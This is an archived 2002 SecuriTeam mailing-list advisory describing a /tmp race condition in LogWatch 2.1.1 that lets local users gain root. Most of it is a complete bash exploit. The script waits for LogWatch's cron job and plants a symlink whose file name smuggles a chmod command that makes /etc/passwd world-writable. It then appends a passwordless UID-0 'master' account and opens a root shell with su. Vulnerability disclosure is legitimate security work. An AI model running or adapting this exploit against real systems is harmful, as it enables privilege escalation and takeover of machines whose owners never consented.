[EXPL] Root Compromise through LogWatch (Exploit code)
From: support@securiteam.comDate: 03/28/02
- Previous message: support@securiteam.com: "[NT] Retrieving Information on Local Files Via Internet Explorer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 28 Mar 2002 13:26:46 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Root Compromise through LogWatch (Exploit code)
------------------------------------------------------------------------
SUMMARY
<http://www.kaybee.org/~kirk/html/linux.html> LogWatch is a customizable,
pluggable log-monitoring system. It will go through your logs for a given
period and make a report in the areas that you wish with the detail that
you wish. Easy to use - works right out of the package on almost all
systems. This is like DailyScript, but much, much better... and designed
for RHL5. A /tmp race condition in the product can be used by local
attackers to gain root privileges.
DETAILS
Vulnerable systems:
LogWatch version 2.1.1
On a system running LogWatch, a local user is able to gain unauthorized
root access, due to a race condition during the temporary directory
creation.
Exploit:
cat > logwatch211.sh <<EOF
#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>
SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/
echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak <spybreak@host.sk>'
echo
echo "Waiting for LogWatch to be executed"
while :; do
set `ps -o pid -C $SERVANT`
if [ -n "$2" ]; then
mkdir /tmp/logwatch.$2
ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
break;
fi
done
echo "Waiting for LogWatch to finish it's work"
while :; do
set `ps -o pid -C $SERVANT`
if [ -z "$2" ]; then
ls -l /etc/passwd|mail root
echo master::0:0:master:/root:/bin/bash >> /etc/passwd
break;
fi
done
su master
EOF
ADDITIONAL INFORMATION
The information has been provided by <mailto:spybreak@host.sk> Spybreak.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Retrieving Information on Local Files Via Internet Explorer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
